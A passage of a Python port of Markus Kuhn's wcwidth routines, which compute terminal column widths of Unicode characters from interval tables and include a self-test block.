# will require a careful analysis not only of each Unicode character,
# but also of each presentation form, something the author of these
# routines has avoided to do so far.
#
# http://www.unicode.org/unicode/reports/tr11/
#
# Markus Kuhn -- 2007-05-26 (Unicode 5.0)
#
# Permission to use, copy, modify, and distribute this software
# for any purpose and without fee is hereby granted. The author
# disclaims all warranties with regard to this software.
#
# Latest C version: http://www.cl.cam.ac.uk/~mgk25/ucs/wcwidth.c
# auxiliary function for binary search in interval table
def bisearch(ucs, table):
min = 0
max = len(table) - 1
if ucs < table[0][0] or ucs > table[max][1]:
return 0
while max >= min:
mid = (min + max) / 2
if ucs > table[mid][1]:
min = mid + 1
elif ucs < table[mid][0]:
max = mid - 1
else:
return 1
return 0
# The following two functions define the column width of an ISO 10646
# character as follows:
#
# - The null character (U+0000) has a column width of 0.
#
# - Other C0/C1 control characters and DEL will lead to a return
# value of -1.
#
# - Non-spacing and enclosing combining characters (general
# category code Mn or Me in the Unicode database) have a
# column width of 0.
#
# - SOFT HYPHEN (U+00AD) has a column width of 1.
#
# - Other format characters (general category code Cf in the Unicode
# database) and ZERO WIDTH SPACE (U+200B) have a column width of 0.
#
# - Hangul Jamo medial vowels and final consonants (U+1160-U+11FF)
# have a column width of 0.
#
# - Spacing characters in the East Asian Wide (W) or East Asian
# Full-width (F) category as defined in Unicode Technical
# Report #11 have a column width of 2.
#
# - All remaining characters (including all printable
# ISO 8859-1 and WGL4 characters, Unicode control characters,
# etc.) have a column width of 1.
#
# This implementation assumes that wchar_t characters are encoded
# in ISO 10646.
# sorted list of non-overlapping intervals of non-spacing characters
# generated by "uniset +cat=Me +cat=Mn +cat=Cf -00AD +1160-11FF +200B c"
combining = (
( 0x0300, 0x036F ), ( 0x0483, 0x0486 ), ( 0x0488, 0x0489 ),
( 0x0591, 0x05BD ), ( 0x05BF, 0x05BF ), ( 0x05C1, 0x05C2 ),
( 0x05C4, 0x05C5 ), ( 0x05C7, 0x05C7 ), ( 0x0600, 0x0603 ),
( 0x0610, 0x0615 ), ( 0x064B, 0x065E ), ( 0x0670, 0x0670 ),
( 0x06D6, 0x06E4 ), ( 0x06E7, 0x06E8 ), ( 0x06EA, 0x06ED ),
( 0x070F, 0x070F ), ( 0x0711, 0x0711 ), ( 0x0730, 0x074A ),
( 0x07A6, 0x07B0 ), ( 0x07EB, 0x07F3 ), ( 0x0901, 0x0902 ),
( 0x093C, 0x093C ), ( 0x0941, 0x0948 ), ( 0x094D, 0x094D ),
( 0x0951, 0x0954 ), ( 0x0962, 0x0963 ), ( 0x0981, 0x0981 ),
( 0x09BC, 0x09BC ), ( 0x09C1, 0x09C4 ), ( 0x09CD, 0x09CD ),
( 0x09E2, 0x09E3 ), ( 0x0A01, 0x0A02 ), ( 0x0A3C, 0x0A3C ),
( 0x0A41, 0x0A42 ), ( 0x0A47, 0x0A48 ), ( 0x0A4B, 0x0A4D ),
( 0x0A70, 0x0A71 ), ( 0x0A81, 0x0A82 ), ( 0x0ABC, 0x0ABC ),
( 0x0AC1, 0x0AC5 ), ( 0x0AC7, 0x0AC8 ), ( 0x0ACD, 0x0ACD ),
( 0x0AE2, 0x0AE3 ), ( 0x0B01, 0x0B01 ), ( 0x0B3C, 0x0B3C ),
( 0x0B3F, 0x0B3F ), ( 0x0B41, 0x0B43 ), ( 0x0B4D, 0x0B4D ),
( 0x0B56, 0x0B56 ), ( 0x0B82, 0x0B82 ), ( 0x0BC0, 0x0BC0 ),
( 0x0BCD, 0x0BCD ), ( 0x0C3E, 0x0C40 ), ( 0x0C46, 0x0C48 ),
( 0x0C4A, 0x0C4D ), ( 0x0C55, 0x0C56 ), ( 0x0CBC, 0x0CBC ),
( 0x0CBF, 0x0CBF ), ( 0x0CC6, 0x0CC6 ), ( 0x0CCC, 0x0CCD ),
( 0x0CE2, 0x0CE3 ), ( 0x0D41, 0x0D43 ), ( 0x0D4D, 0x0D4D ),
( 0x0DCA, 0x0DCA ), ( 0x0DD2, 0x0DD4 ), ( 0x0DD6, 0x0DD6 ),
( 0x0E31, 0x0E31 ), ( 0x0E34, 0x0E3A ), ( 0x0E47, 0x0E4E ),
( 0x0EB1, 0x0EB1 ), ( 0x0EB4, 0x0EB9 ), ( 0x0EBB, 0x0EBC ),
( 0x0EC8, 0x0ECD ), ( 0x0F18, 0x0F19 ), ( 0x0F35, 0x0F35 ),
( 0x0F37, 0x0F37 ), ( 0x0F39, 0x0F39 ), ( 0x0F71, 0x0F7E ),
( 0x0F80, 0x0F84 ), ( 0x0F86, 0x0F87 ), ( 0x0F90, 0x0F97 ),
( 0x0F99, 0x0FBC ), ( 0x0FC6, 0x0FC6 ), ( 0x102D, 0x1030 ),
( 0x1032, 0x1032 ), ( 0x1036, 0x1037 ), ( 0x1039, 0x1039 ),
( 0x1058, 0x1059 ), ( 0x1160, 0x11FF ), ( 0x135F, 0x135F ),
( 0x1712, 0x1714 ), ( 0x1732, 0x1734 ), ( 0x1752, 0x1753 ),
( 0x1772, 0x1773 ), ( 0x17B4, 0x17B5 ), ( 0x17B7, 0x17BD ),
( 0x17C6, 0x17C6 ), ( 0x17C9, 0x17D3 ), ( 0x17DD, 0x17DD ),
( 0x180B, 0x180D ), ( 0x18A9, 0x18A9 ), ( 0x1920, 0x1922 ),
( 0x1927, 0x1928 ), ( 0x1932, 0x1932 ), ( 0x1939, 0x193B ),
( 0x1A17, 0x1A18 ), ( 0x1B00, 0x1B03 ), ( 0x1B34, 0x1B34 ),
( 0x1B36, 0x1B3A ), ( 0x1B3C, 0x1B3C ), ( 0x1B42, 0x1B42 ),
( 0x1B6B, 0x1B73 ), ( 0x1DC0, 0x1DCA ), ( 0x1DFE, 0x1DFF ),
( 0x200B, 0x200F ), ( 0x202A, 0x202E ), ( 0x2060, 0x2063 ),
( 0x206A, 0x206F ), ( 0x20D0, 0x20EF ), ( 0x302A, 0x302F ),
( 0x3099, 0x309A ), ( 0xA806, 0xA806 ), ( 0xA80B, 0xA80B ),
( 0xA825, 0xA826 ), ( 0xFB1E, 0xFB1E ), ( 0xFE00, 0xFE0F ),
( 0xFE20, 0xFE23 ), ( 0xFEFF, 0xFEFF ), ( 0xFFF9, 0xFFFB ),
( 0x10A01, 0x10A03 ), ( 0x10A05, 0x10A06 ), ( 0x10A0C, 0x10A0F ),
( 0x10A38, 0x10A3A ), ( 0x10A3F, 0x10A3F ), ( 0x1D167, 0x1D169 ),
( 0x1D173, 0x1D182 ), ( 0x1D185, 0x1D18B ), ( 0x1D1AA, 0x1D1AD ),
( 0x1D242, 0x1D244 ), ( 0xE0001, 0xE0001 ), ( 0xE0020, 0xE007F ),
( 0xE0100, 0xE01EF )
)
# sorted list of non-overlapping intervals of East Asian Ambiguous
# characters, generated by "uniset +WIDTH-A -cat=Me -cat=Mn -cat=Cf c"
ambiguous = (
( 0x00A1, 0x00A1 ), ( 0x00A4, 0x00A4 ), ( 0x00A7, 0x00A8 ),
( 0x00AA, 0x00AA ), ( 0x00AE, 0x00AE ), ( 0x00B0, 0x00B4 ),
( 0x00B6, 0x00BA ), ( 0x00BC, 0x00BF ), ( 0x00C6, 0x00C6 ),
( 0x00D0, 0x00D0 ), ( 0x00D7, 0x00D8 ), ( 0x00DE, 0x00E1 ),
( 0x00E6, 0x00E6 ), ( 0x00E8, 0x00EA ), ( 0x00EC, 0x00ED ),
( 0x00F0, 0x00F0 ), ( 0x00F2, 0x00F3 ), ( 0x00F7, 0x00FA ),
( 0x00FC, 0x00FC ), ( 0x00FE, 0x00FE ), ( 0x0101, 0x0101 ),
( 0x0111, 0x0111 ), ( 0x0113, 0x0113 ), ( 0x011B, 0x011B ),
( 0x0126, 0x0127 ), ( 0x012B, 0x012B ), ( 0x0131, 0x0133 ),
( 0x0138, 0x0138 ), ( 0x013F, 0x0142 ), ( 0x0144, 0x0144 ),
( 0x0148, 0x014B ), ( 0x014D, 0x014D ), ( 0x0152, 0x0153 ),
( 0x0166, 0x0167 ), ( 0x016B, 0x016B ), ( 0x01CE, 0x01CE ),
( 0x01D0, 0x01D0 ), ( 0x01D2, 0x01D2 ), ( 0x01D4, 0x01D4 ),
( 0x01D6, 0x01D6 ), ( 0x01D8, 0x01D8 ), ( 0x01DA, 0x01DA ),
( 0x01DC, 0x01DC ), ( 0x0251, 0x0251 ), ( 0x0261, 0x0261 ),
( 0x02C4, 0x02C4 ), ( 0x02C7, 0x02C7 ), ( 0x02C9, 0x02CB ),
( 0x02CD, 0x02CD ), ( 0x02D0, 0x02D0 ), ( 0x02D8, 0x02DB ),
( 0x02DD, 0x02DD ), ( 0x02DF, 0x02DF ), ( 0x0391, 0x03A1 ),
( 0x03A3, 0x03A9 ), ( 0x03B1, 0x03C1 ), ( 0x03C3, 0x03C9 ),
( 0x0401, 0x0401 ), ( 0x0410, 0x044F ), ( 0x0451, 0x0451 ),
( 0x2010, 0x2010 ), ( 0x2013, 0x2016 ), ( 0x2018, 0x2019 ),
( 0x201C, 0x201D ), ( 0x2020, 0x2022 ), ( 0x2024, 0x2027 ),
( 0x2030, 0x2030 ), ( 0x2032, 0x2033 ), ( 0x2035, 0x2035 ),
( 0x203B, 0x203B ), ( 0x203E, 0x203E ), ( 0x2074, 0x2074 ),
( 0x207F, 0x207F ), ( 0x2081, 0x2084 ), ( 0x20AC, 0x20AC ),
( 0x2103, 0x2103 ), ( 0x2105, 0x2105 ), ( 0x2109, 0x2109 ),
( 0x2113, 0x2113 ), ( 0x2116, 0x2116 ), ( 0x2121, 0x2122 ),
( 0x2126, 0x2126 ), ( 0x212B, 0x212B ), ( 0x2153, 0x2154 ),
( 0x215B, 0x215E ), ( 0x2160, 0x216B ), ( 0x2170, 0x2179 ),
( 0x2190, 0x2199 ), ( 0x21B8, 0x21B9 ), ( 0x21D2, 0x21D2 ),
( 0x21D4, 0x21D4 ), ( 0x21E7, 0x21E7 ), ( 0x2200, 0x2200 ),
( 0x2202, 0x2203 ), ( 0x2207, 0x2208 ), ( 0x220B, 0x220B ),
( 0x220F, 0x220F ), ( 0x2211, 0x2211 ), ( 0x2215, 0x2215 ),
( 0x221A, 0x221A ), ( 0x221D, 0x2220 ), ( 0x2223, 0x2223 ),
( 0x2225, 0x2225 ), ( 0x2227, 0x222C ), ( 0x222E, 0x222E ),
( 0x2234, 0x2237 ), ( 0x223C, 0x223D ), ( 0x2248, 0x2248 ),
( 0x224C, 0x224C ), ( 0x2252, 0x2252 ), ( 0x2260, 0x2261 ),
( 0x2264, 0x2267 ), ( 0x226A, 0x226B ), ( 0x226E, 0x226F ),
( 0x2282, 0x2283 ), ( 0x2286, 0x2287 ), ( 0x2295, 0x2295 ),
( 0x2299, 0x2299 ), ( 0x22A5, 0x22A5 ), ( 0x22BF, 0x22BF ),
( 0x2312, 0x2312 ), ( 0x2460, 0x24E9 ), ( 0x24EB, 0x254B ),
( 0x2550, 0x2573 ), ( 0x2580, 0x258F ), ( 0x2592, 0x2595 ),
( 0x25A0, 0x25A1 ), ( 0x25A3, 0x25A9 ), ( 0x25B2, 0x25B3 ),
( 0x25B6, 0x25B7 ), ( 0x25BC, 0x25BD ), ( 0x25C0, 0x25C1 ),
( 0x25C6, 0x25C8 ), ( 0x25CB, 0x25CB ), ( 0x25CE, 0x25D1 ),
( 0x25E2, 0x25E5 ), ( 0x25EF, 0x25EF ), ( 0x2605, 0x2606 ),
( 0x2609, 0x2609 ), ( 0x260E, 0x260F ), ( 0x2614, 0x2615 ),
( 0x261C, 0x261C ), ( 0x261E, 0x261E ), ( 0x2640, 0x2640 ),
( 0x2642, 0x2642 ), ( 0x2660, 0x2661 ), ( 0x2663, 0x2665 ),
( 0x2667, 0x266A ), ( 0x266C, 0x266D ), ( 0x266F, 0x266F ),
( 0x273D, 0x273D ), ( 0x2776, 0x277F ), ( 0xE000, 0xF8FF ),
( 0xFFFD, 0xFFFD ), ( 0xF0000, 0xFFFFD ), ( 0x100000, 0x10FFFD )
)
def mk_wcwidth(ucs):
# test for 8-bit control characters
if ucs == 0:
return 0
if ucs < 32 or (ucs >= 0x7f and ucs < 0xa0):
return -1
# binary search in table of non-spacing characters
if bisearch(ucs, combining):
return 0
# if we arrive here, ucs is not a combining or C0/C1 control character
return 1 + \
int(ucs >= 0x1100 and
(ucs <= 0x115f or # Hangul Jamo init. consonants
ucs == 0x2329 or ucs == 0x232a or
(ucs >= 0x2e80 and ucs <= 0xa4cf and
ucs != 0x303f) or # CJK ... Yi
(ucs >= 0xac00 and ucs <= 0xd7a3) or # Hangul Syllables
(ucs >= 0xf900 and ucs <= 0xfaff) or # CJK Compatibility Ideographs
(ucs >= 0xfe10 and ucs <= 0xfe19) or # Vertical forms
(ucs >= 0xfe30 and ucs <= 0xfe6f) or # CJK Compatibility Forms
(ucs >= 0xff00 and ucs <= 0xff60) or # Fullwidth Forms
(ucs >= 0xffe0 and ucs <= 0xffe6) or
(ucs >= 0x20000 and ucs <= 0x2fffd) or
(ucs >= 0x30000 and ucs <= 0x3fffd)))
def mk_wcswidth(pwcs):
width = 0
for c in pwcs:
w = mk_wcwidth(c)
if w < 0:
return -1
else:
width += w
return width
# The following functions are the same as mk_wcwidth() and
# mk_wcswidth(), except that spacing characters in the East Asian
# Ambiguous (A) category as defined in Unicode Technical Report #11
# have a column width of 2. This variant might be useful for users of
# CJK legacy encodings who want to migrate to UCS without changing
# the traditional terminal character-width behaviour. It is not
# otherwise recommended for general use.
def mk_wcwidth_cjk(ucs):
# binary search in table of non-spacing characters
if bisearch(ucs, ambiguous):
return 2
return mk_wcwidth(ucs)
def mk_wcswidth_cjk(pwcs):
width = 0
for c in pwcs:
w = mk_wcwidth_cjk(c)
if w < 0:
return -1
width += w
return width
# python-y versions, dealing with unicode objects
def wcwidth(c):
return mk_wcwidth(ord(c))
def wcswidth(s):
return mk_wcswidth(map(ord, s))
def wcwidth_cjk(c):
return mk_wcwidth_cjk(ord(c))
def wcswidth_cjk(s):
return mk_wcswidth_cjk(map(ord, s))
if __name__ == "__main__":
samples = (
('MUSIC SHARP SIGN', 1),
('FULLWIDTH POUND SIGN', 2),
('FULLWIDTH LATIN CAPITAL LETTER P', 2),
('CJK RADICAL BOLT OF CLOTH', 2),
('LATIN SMALL LETTER A', 1),
('LATIN SMALL LETTER AE', 1),
('SPACE', 1),
('NO-BREAK SPACE', 1),
('CJK COMPATIBILITY IDEOGRAPH-F920', 2),
('MALAYALAM VOWEL SIGN UU', 0),
('ZERO WIDTH SPACE', 0),
('ZERO WIDTH NO-BREAK SPACE', 0),
('COMBINING PALATALIZED HOOK BELOW', 0),
('COMBINING GRAVE ACCENT', 0),
)
nonprinting = u'\r\n\t\a\b\f\v\x7f'
import unicodedata
for name, printwidth in samples:
uchr = unicodedata.lookup(name)
calculatedwidth = wcwidth(uchr)
assert calculatedwidth == printwidth, \
'width for %r should be %d, but is %d?' % (uchr, printwidth, calculatedwidth)
for c in nonprinting:
calculatedwidth = wcwidth(c)
assert calculatedwidth < 0, \
'%r is a control character, but wcwidth gives %d' % (c, calculatedwidth)
assert wcwidth('\0') == 0 # special case
# depending on how python is compiled, code points above U+FFFF may not be
# treated as single characters, so ord() won't work. test a few of these
# manually.
assert mk_wcwidth(0xe01ef) == 0
assert mk_wcwidth(0x10ffff) == 1
assert mk_wcwidth(0x3fffd) == 2
teststr = u'B\0ig br\u00f8wn moose\ub143\u200b'
calculatedwidth = wcswidth(teststr)
assert calculatedwidth == 17, 'expected 17, got %d' % calculatedwidth
calculatedwidth = wcswidth_cjk(teststr)
assert calculatedwidth == 18, 'expected 18, got %d' % calculatedwidth
assert wcswidth(u'foobar\u200b\a') < 0
print 'tests pass.'
| apache-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.